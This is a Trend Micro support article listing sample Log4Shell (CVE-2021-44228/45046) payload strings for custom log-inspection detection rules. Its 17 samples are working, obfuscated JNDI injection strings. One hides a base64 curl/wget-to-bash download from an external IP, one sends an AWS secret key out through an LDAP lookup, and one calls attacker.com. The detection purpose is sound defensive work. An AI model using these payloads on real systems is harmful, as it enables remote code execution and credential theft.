Sign In with your
Trend Micro Account
Need Help?
Need More Help?

Create a technical support case if you need further support.

Custom Log Inspection Rules for Log4Shell Vulnerability on Trend Micro Cloud One - Workload Security and Deep Security

    • Updated:
    • 17 Dec 2021
    • Product/Version:
    • Cloud One - Workload Security
    • Deep Security 20.0
    • Platform:
Summary
The following article covers custom Trend Micro Cloud One - Workload Security and Deep Security Log Inspection (LI) rules that may be helped to investigate potential activity associated with the Log4Shell vulnerability (CVE-2021-44228 and CVE-2021-45046).

Trend Micro's mainline protection article can be found here
 
Details
Public
A custom LI rule can be created to detect patterns as discovered in the future.  Users may follow the steps located at Define a Log Inspection rule for use in policies - Workload Security | Trend Micro Cloud One™ Documentation and add the following sample patterns in the pattern matching field:  
 
1${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==}
2${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
3${${lower:jn}di:ldap://172.31.39.127:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
4${${l${lower:ow}er:j}ndi:ldap://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
5${jndi${lower::}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
6${jndi${lower::${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
7${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
8${jndi:ldap://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
9${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
10${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
11${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
12${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:dn}${lower:s}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
13${${::-j}ndi:rmi://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
14${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:iio}${lower:p}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
15${${lower:jndi}:${lower:rmi}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
16${jndi:ldap://172.31.39.127:1399/path/${env:aws_secret_key}}
17${${::-j}ndi:rmi://attacker.com/poc}
  
 
Premium
Internal
Partner
Rating:
Category:
Remove a Malware / Virus
Solution Id:
000289992
Feedback
Did this article help you?

Thank you for your feedback!


*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.

If you need additional help, you may try to contact the support team. Contact Support

To help us improve the quality of this article, please leave your email here so we can clarify further your feedback, if neccessary:
We will not send you spam or share your email address.

*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.